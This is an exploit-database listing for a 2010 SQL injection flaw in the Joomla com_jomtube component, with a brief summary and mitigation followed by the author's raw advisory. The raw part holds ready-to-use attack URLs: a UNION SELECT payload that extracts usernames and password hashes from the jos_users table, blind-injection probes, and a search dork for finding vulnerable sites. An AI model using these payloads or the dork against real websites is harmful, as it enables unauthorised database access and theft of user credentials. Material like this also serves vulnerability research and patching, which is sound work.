header-logo
Suggest Exploit
vendor:
Jomtube
by:
SixP4ck3r
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Jomtube
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component com_jomtube (user_id) Blind SQL Injection / SQL Injection

A vulnerability exists in Joomla Component com_jomtube (user_id) which allows an attacker to inject arbitrary SQL commands. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can result in the disclosure of sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

===============================================================================
Joomla Component com_jomtube (user_id) Blind SQL Injection / SQL Injection
===============================================================================

Author          : SixP4ck3r
Email & msn     : SixP4ck3r@Bolivia.com
Date            : 17 July 2010
Critical Lvl    : High
Impact          : Exposure of sensitive information
Where           : From Remote
web		: http://foro.nbsecurity.net/
Credits		: Diablada and caporal is Bolivian!
Dork		: inurl:com_jomtube

---------------------------------------------------------------------------

[Sofware afected info]
Joomla Component (com_jomtube)
[Download]
http://www.jomtube.com/
[Afected versions]
All versions + 0 day

---------------------------------------------------------------------------

[Exploting..Bug..Demo..]
[insert valid user_id=n]

http://example/index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9

,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+fr

om+jos_users--&option=com_jomtube

[Blind SQL Injection]
http://example/index.php?view=videos&type=member&user_id=62+and+1=1--&option=com_jomtube
http://example/index.php?view=videos&type=member&user_id=62+and+1=0--&option=com_jomtube
---------------------------------------------------------------------------

With R3gards,
SixP4ck3r from Bolivia
___eof____